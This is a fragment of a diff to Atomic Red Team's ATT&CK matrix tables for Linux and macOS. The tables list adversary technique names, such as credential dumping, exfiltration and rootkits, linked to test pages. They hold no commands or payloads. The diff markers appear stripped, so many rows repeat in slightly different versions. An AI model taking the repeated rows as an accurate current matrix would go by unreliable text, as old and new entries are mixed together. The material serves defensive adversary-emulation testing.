| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](../../T1064/T1064.md) | [Create Account](../../T1136/T1136.md) | [Sudo Caching](../../T1206/T1206.md) | [Connection Proxy](../../T1090/T1090.md) | [Credential Dumping](../../T1003/T1003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote File Copy](../../T1105/T1105.md) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](../../T1059/T1059.md) | [.bash_profile and .bashrc](../../T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Discovery](../../T1087/T1087.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Binary Padding](../../T1009/T1009.md) | [Bash History](../../T1139/T1139.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Compressed](../../T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1166/T1166.md) | [Clear Command History](../../T1146/T1146.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted](../../T1022/T1022.md) | [Connection Proxy](../../T1090/T1090.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](../../T1168/T1168.md) | [Browser Extensions](../../T1176/T1176.md) | [Sudo](../../T1169/T1169.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](../../T1074/T1074.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](../../T1064/T1064.md) | [Create Account](../../T1136/T1136.md) | [Sudo Caching](../../T1206/T1206.md) | [Connection Proxy](../../T1090/T1090.md) | Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote File Copy](../../T1105/T1105.md) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](../../T1153/T1153.md) | [Hidden Files and Directories](../../T1158/T1158.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](../../T1089/T1089.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](../../T1132/T1132.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](../../T1151/T1151.md) | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Web Shell](../../T1100/T1100.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](../../T1081/T1081.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](../../T1081/T1081.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1215/T1215.md) | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1154/T1154.md) | [Local Job Scheduling](../../T1168/T1168.md) | | [File Deletion](../../T1107/T1107.md) | [Input Capture](../../T1056/T1056.md) | [Password Policy Discovery](../../T1201/T1201.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | [User Execution](../../T1204/T1204.md) | [Office Application Startup](../../T1137/T1137.md) | | [File and Directory Permissions Modification](../../T1222/T1222.md) | [Network Sniffing](../../T1040/T1040.md) | [Permission Groups Discovery](../../T1069/T1069.md) | | [Email Collection](../../T1114/T1114.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [HISTCONTROL](../../T1148/T1148.md) | [Private Keys](../../T1145/T1145.md) | [Process Discovery](../../T1057/T1057.md) | | [Input Capture](../../T1056/T1056.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1154/T1154.md) | [Local Job Scheduling](../../T1168/T1168.md) | | [File Deletion](../../T1107/T1107.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [File and Directory Permissions Modification](../../T1222/T1222.md) | [Network Sniffing](../../T1040/T1040.md) | [Permission Groups Discovery](../../T1069/T1069.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [HISTCONTROL](../../T1148/T1148.md) | [Private Keys](../../T1145/T1145.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Hidden Files and Directories](../../T1158/T1158.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Server Software Component](../../T1505/T1505.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Setuid and Setgid](../../T1166/T1166.md) | | [Indicator Removal on Host](../../T1070/T1070.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Systemd Service](../../T1501/T1501.md) | | [Install Root Certificate](../../T1130/T1130.md) | | [System Network Configuration Discovery](../../T1016/T1016.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Trap](../../T1154/T1154.md) | | [Masquerading](../../T1036/T1036.md) | | [System Network Connections Discovery](../../T1049/T1049.md) | | | | [Remote Access Tools](../../T1219/T1219.md) | |
|
||||
| | | [Trap](../../T1154/T1154.md) | | [Masquerading](../../T1036/T1036.md) | | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | [System Owner/User Discovery](../../T1033/T1033.md) | | | | [Remote File Copy](../../T1105/T1105.md) | |
|
||||
| | | [Web Shell](../../T1100/T1100.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](../../T1071/T1071.md) | |
|
||||
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | [Standard Cryptographic Protocol](../../T1032/T1032.md) | |
|
||||
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](../../T1071/T1071.md) | |
|
||||
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Uncommonly Used Port](../../T1065/T1065.md) | |
|
||||
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | [Web Service](../../T1102/T1102.md) | |
|
||||
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | | | [Scripting](../../T1064/T1064.md) | | | | | | | |
|
||||
| | | | | [Space after Filename](../../T1151/T1151.md) | | | | | | | |
|
||||
| | | | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Timestomp](../../T1099/T1099.md) | | | | | | | |
|
||||
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Web Service](../../T1102/T1102.md) | | | | | | | |
|
||||
| | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
|
||||
@@ -1,37 +1,37 @@
|
||||
# macOS Atomic Tests by ATT&CK Tactic & Technique
|
||||
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|
||||
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1155/T1155.md) | [.bash_profile and .bashrc](../../T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1009/T1009.md) | [Bash History](../../T1139/T1139.md) | [Account Discovery](../../T1087/T1087.md) | [AppleScript](../../T1155/T1155.md) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](../../T1059/T1059.md) | [Browser Extensions](../../T1176/T1176.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1146/T1146.md) | [Brute Force](../../T1110/T1110.md) | [Application Window Discovery](../../T1010/T1010.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | [Data Compressed](../../T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](../../T1136/T1136.md) | [Emond](../../T1519/T1519.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](../../T1003/T1003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | [Data Encrypted](../../T1022/T1022.md) | [Connection Proxy](../../T1090/T1090.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| [Spearphishing Attachment](../../T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1500/T1500.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](../../T1074/T1074.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1155/T1155.md) | [.bash_profile and .bashrc](../../T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1009/T1009.md) | [Bash History](../../T1139/T1139.md) | [Account Discovery](../../T1087/T1087.md) | [AppleScript](../../T1155/T1155.md) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](../../T1059/T1059.md) | [Browser Extensions](../../T1176/T1176.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1146/T1146.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Compressed](../../T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](../../T1136/T1136.md) | [Emond](../../T1519/T1519.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted](../../T1022/T1022.md) | [Connection Proxy](../../T1090/T1090.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](../../T1074/T1074.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1152/T1152.md) | [Emond](../../T1519/T1519.md) | [Launch Daemon](../../T1160/T1160.md) | [Connection Proxy](../../T1090/T1090.md) | [Credentials in Files](../../T1081/T1081.md) | [Network Service Scanning](../../T1046/T1046.md) | [Logon Scripts](../../T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](../../T1168/T1168.md) | [Hidden Files and Directories](../../T1158/T1158.md) | [Plist Modification](../../T1150/T1150.md) | [Disabling Security Tools](../../T1089/T1089.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Remote File Copy](../../T1105/T1105.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](../../T1132/T1132.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](../../T1064/T1064.md) | [Kernel Modules and Extensions](../../T1215/T1215.md) | [Process Injection](../../T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | [Network Sniffing](../../T1040/T1040.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](../../T1064/T1064.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](../../T1153/T1153.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1166/T1166.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Prompt](../../T1141/T1141.md) | [Password Policy Discovery](../../T1201/T1201.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](../../T1151/T1151.md) | [Launch Agent](../../T1159/T1159.md) | [Startup Items](../../T1165/T1165.md) | [File Deletion](../../T1107/T1107.md) | [Keychain](../../T1142/T1142.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](../../T1151/T1151.md) | [Launch Agent](../../T1159/T1159.md) | [Startup Items](../../T1165/T1165.md) | [File Deletion](../../T1107/T1107.md) | [Keychain](../../T1142/T1142.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1160/T1160.md) | [Sudo](../../T1169/T1169.md) | [File and Directory Permissions Modification](../../T1222/T1222.md) | [Network Sniffing](../../T1040/T1040.md) | [Permission Groups Discovery](../../T1069/T1069.md) | | [Screen Capture](../../T1113/T1113.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Trap](../../T1154/T1154.md) | [Launchctl](../../T1152/T1152.md) | [Sudo Caching](../../T1206/T1206.md) | [Gatekeeper Bypass](../../T1144/T1144.md) | [Private Keys](../../T1145/T1145.md) | [Process Discovery](../../T1057/T1057.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | [User Execution](../../T1204/T1204.md) | [Local Job Scheduling](../../T1168/T1168.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1148/T1148.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
